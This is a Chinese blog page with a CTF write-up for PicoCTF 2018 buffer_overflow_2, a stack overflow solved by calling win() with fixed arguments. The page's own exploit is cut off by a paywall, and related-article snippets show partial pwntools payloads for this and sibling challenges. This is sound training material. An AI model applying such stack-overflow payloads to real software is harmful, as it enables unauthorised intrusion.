PicoCTF_2018_buffer_overflow_2

PicoCTF缓冲区溢出挑战第二关解析

最新推荐文章于 2024-09-03 21:44:16 发布

原创

最新推荐文章于 2024-09-03 21:44:16 发布 · 450 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#pwn #网络安全 #安全

PicoCTF_2018_buffer_overflow_2

使用checksec查看：
在这里插入图片描述
开启了栈不可执行，放进IDA中查看，其实和PicoCTF_2018_buffer_overflow_1没啥变化

唯一做了变动的是win()函数：
在这里插入图片描述
上一题是直接跳到这个函数就能读取到flag，这题需要给win()函数两个参数a1、a2

a1需要等于0xDEADBEEF
a2需要等于0xDEADC0DE

才能读取到flag。

那么直接传参即可，秒了。

exp：

from pwn import *

#start
r = remote("node4.buuoj.cn"

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

m0sway

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BUUCTF：PicoCTF_2018_buffer_overflow_2

weixin_51055545的博客

01-05

1005

例行检查程序：还是32位程序，没有canary，很可能是溢出类的。放到IDA中：主函数没什么特别，进入vuln()函数看一下：果然存在溢出漏洞，两次溢出，直接去get shell 第一次溢出去泄露libc地址，第二次溢出get shell 这里我选怎printf()函数作为泄露的函数，同样也可以选择puts()函数，构造payload ： io.recvuntil(':') payload = 'A'*0x6c payload += p32(0) payload += p32(

PicoCTF_2018_buffer_overflow_1

m0sway的博客

11-28

533

PicoCTF_2018_buffer_overflow_1 使用checksec查看：保护机制全关，看起来没啥难度。扔进IDA中查看：主函数中给出了漏洞函数，跟进查看： gets()函数，栈溢出，s距离ebp0x28 查看下这题的字符串可以发现函数win()：能够直接获取到flag，直接秒了这题。 exp： from pwn import * #start # r = process("../buu/PicoCTF_2018_buffer_overflow_1") r = remote

参与评论您还未登录，请先登录后发表或查看评论

[BUUCTF-pwn]——picoctf_2018_buffer overflow 2

Y_peak的博客

03-17

516

[BUUCTF-pwn]——picoctf_2018_buffer overflow 2 简单的栈溢出，不过需要将参数自己设置而已注意负数如何转换为补码，不知道也可以直接在汇编里面找 from pwn import * p = remote('node3.buuoj.cn',28931) a1 = 0xdeadbeef a2 = 0xdeadc0de payload = 'a' * (0x6c + 4) + p32(0x080485CB) + p32(0)+ p32(a1) + p32(a2) p.re

PicoCTF_2018_buffer_overflow_2详细wp

m0_46204503的博客

11-12

3221

PicoCTF_2018_buffer_overflow_2 知识点函数调用栈机制（栈溢出）栈传参 32位程序栈传参，以逆序传入参数，即最后一个参数在最高地址 64位程序前6个参数是寄存器传参，前6个参数分别存在rdi、rsi、rdx、rcx、r8、r9 little trick 如何将一个数转化成底层的二进制的机器码手算网上找在线工具，这里不做介绍在IDA中看汇编代码因为c代码都可以当做一组汇编指令，比如从上述的0x804861D开始到0x804862D四句汇编指令

picoctf_2018_buffer_overflow_2

z1r0的博客

12-11

249

picoctf_2018_buffer_overflow_2 查看保护有溢出，还有一个getflag函数，但是想要利用需要给两个参数，结合32位下的系统调用规则即可get flag from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27317) else:

BUUCTF pwn——picoctf_2018_buffer overflow 2

CNS-Enterprise BCC-1701-J

05-20

206

BUUCTF 做题练习

BUUCTF：PicoCTF_2018_buffer_overflow_1

weixin_51055545的博客

01-05

1459

先放进虚拟机中检查：任何保护机制都没开，放到32位IDA中：主函数很简单，进入vuln()函数看一下: 很明显有溢出，进入栈中看偏移：这里偏移为0x28，我们思路是第一次溢出，去泄露libc地址，再次进行溢出get shell。第一次溢出： io.recvuntil(':') payload = 'A'*0X28 payload += p32(0) payload += p32(printf) payload += p32(main) payload += p32(elf.got.

picoctf_2018_buffer overflow 2 1

weixin_74861133的博客

03-12

431

主要漏洞在vuln()里面，gets函数有栈溢出漏洞，s距离ebp为0x6C又发现可疑函数win()，点进去看发现只要该函数的两个参数a1和a2满足相应的条件(a1 == -559038737 && a2 == -559038242)就可以直接打印flag。将条件中的数字转换为16进制为a1 == 0xDEADBEEF && a2 == 0xDEADC0DE。故该题思路为利用栈溢出溢出返回地址到win函数然后传递正确的参数a1与a2使其输出flag，先上exp。

picoctf_2018_buffer overflow 2

最新发布

m0_73743784的博客

09-03

437

简单的ret2text，但是需要知道函数调用栈中参数的传值的相关知识。

BUUCTF picoctf_2018_buffer overflow 2

qq_51821131的博客

10-05

1488

picoctf_2018_buffer overflow 2 检查保护，且为32位明显栈溢出找到win函数可以打印flag 整合思路，栈溢出，向win函数传入参数并满足条件即可 from pwn import * p=remote('node4.buuoj.cn',25086) #context.terminal = ['tmux', 'splitw', '-h'] elf=ELF('./PicoCTF_2018_buffer_overflow_2') win=0x080485CB a1=0xDE

[BUUCTF]PWN——picoctf_2018_buffer overflow 2

BangSen1的博客

03-31

735

picoctf_2018_buffer overflow 2 例行检查，32位，开启NX保护运行一下，用IDA打开。看到了flag.txt，跟进一下。 win函数地址为0x80485cb a1 == 0xDEADBEEF && a2 == 0xDEADC0DE 时，输出flag. from pwn import* r=remote('node3.buuoj.cn',26224) payload='a'*(0x6c+4)+p32(0x80485cb)+p32(0)+p32(0x

picoctf_2018_buffer overflow 0

z1r0的博客

02-14

497

picoctf_2018_buffer overflow 0 查看保护这里会将flag输入到flag这个全局变量里，还有一个signal信号11。表示对存储的无效访问这里的话将flag写到stderr中。然后fflush(stdeer)刷新标准错误输出缓冲区，把输出缓冲区里的东西打印到标准输出设备上，也就是会打印flag。其实就是当程序造成无效内存访问的时候，就会输出flag。接着再输入参数，放到vuln函数里这里有一个栈溢出，因为输入的参数可以无限长，所以在执行栈溢出时，程序会造成无效内

[BUUCTF-pwn]——picoctf_2018_buffer overflow 1

Y_peak的博客

03-16

419

[BUUCTF-pwn]——picoctf_2018_buffer overflow 1 简单的栈溢出，返回地址，设置为win就好 exploit from pwn import * p = remote("node3.buuoj.cn",25059) payload = 'a' * (0x28 + 4) + p32(0x080485CB) p.sendline(payload) p.interactive()

picoctf-2018-buffer-overflow-1

m0_73743784的博客

09-01

485

非常简单的ret2text，但是其他的信息稍微有点多。

PicoCTF_2018_buffer_overflow_3(本地固定canary的爆破)

seaaseesa的博客

05-01

946

PicoCTF_2018_buffer_overflow_3 用IDA分析一下程序，程序从一个固定文件里读取数据，作为canary的值。由于文件内容不变，所以，我们可以直接爆破。 #coding:utf8 from pwn import * shell = ssh(host='node3.buuoj.cn', user='CTFMan', port=27525, passwor...

[BUUCTF-pwn]——picoctf_2018_buffer overflow 0

Y_peak的博客

04-28

526

[BUUCTF-pwn]——picoctf_2018_buffer overflow 0 好久不写BUU了，手都快生了赶快过来写写。通过观察源文件发现，首先有put函数不需要去libc中找，同时argv肯定大于1，也就是需要至少两个参数，才可以到else语句，同时vuln函数的参数是第二个参数。进入vuln函数内部看看，找到strcpy函数这个函数是一个典型的可以用来利用溢出的函数。所以我们可以在这里进行栈溢出，以此调用puts函数打印flag.因为flag在bss段上。 from pwn imp

dp_debug_check_buffer_overflow

05-25

dp_debug_check_buffer_overflow 是一个调试函数，用于检测缓冲区溢出的情况。当程序运行时，如果发现有缓冲区溢出的情况，就会触发 dp_debug_check_buffer_overflow 函数，并打印出相应的调试信息，以便程序员进行...